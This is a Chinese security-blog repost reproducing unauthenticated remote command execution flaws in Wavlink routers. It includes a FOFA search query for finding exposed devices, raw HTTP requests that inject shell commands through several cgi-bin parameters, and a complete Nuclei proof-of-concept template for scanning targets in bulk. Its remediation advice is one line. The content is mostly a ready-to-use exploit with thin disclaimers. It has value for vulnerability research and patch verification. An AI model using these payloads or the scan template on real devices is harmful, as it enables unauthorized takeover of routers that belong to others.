【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

admin

138858
文章

114
评论

2024年1月6日12:32:54评论197 views字数 1953阅读6分30秒阅读模式

免责声明

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

此内容仅供技术交流与学习，请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任，与本文作者及发布平台无关。如有内容争议或侵权，请及时私信我们！

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

漏洞概述

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

睿因（wavlink）路由器，cgi-bin下的多处接口存在命令执行漏洞，允许攻击者通过构造特制的请求包执行系统命令，从而获取未授权的访问权限。攻击者可以利用这个漏洞来获取敏感信息、篡改配置，甚至导致网络和设备的不可预测的损害

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

FoFa

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

icon_hash="-1350437236"

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

漏洞复现

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

POST /cgi-bin/mesh.cgi?page=upgrade&key=';id>.djm0sdjsyt.txt;' HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
page=night_led&start_hour=;id;

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

GET /cgi-bin/.djm0sdjsyt.txt HTTP/1.1Host: Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

Nuclei Poc

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

id: wavlink-rce-all
info:  name: 睿因科技-wavlink-路由器-多处前台RCE  author: rain  severity: critical  metadata:    fofa-query: icon_hash="-1350437236"
variables:  filename: "{{to_lower(rand_base(10))}}"

http:  - raw:      - |          POST /{{path}} HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        Accept-Encoding: gzip        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15                page=night_led&start_hour=;id;      - |        GET /cgi-bin/.{{filename}}.txt HTTP/1.1        Host:{{Hostname}}        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0a/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    attack: batteringram    payloads:      path:        - /cgi-bin/nightled.cgi        - /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id;        - /cgi-bin/mesh.cgi?page=upgrade&key=';id>.{{filename}}.txt;'
    stop-at-first-match: true    matchers:      - type: dsl        dsl:          - contains_all(body, "uid=")

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

修复建议

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

更新至最新版本：确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新，及时应用这些更新以确保系统的安全性。

原文始发于微信公众号（知黑守白）：【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】睿因科技-wavlink-路由器-多处前台RCE

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞

CVE-2024-22243 Spring Web UriComponentsBuilder URL 解析不当漏洞分析

发表评论

在线咨询

微信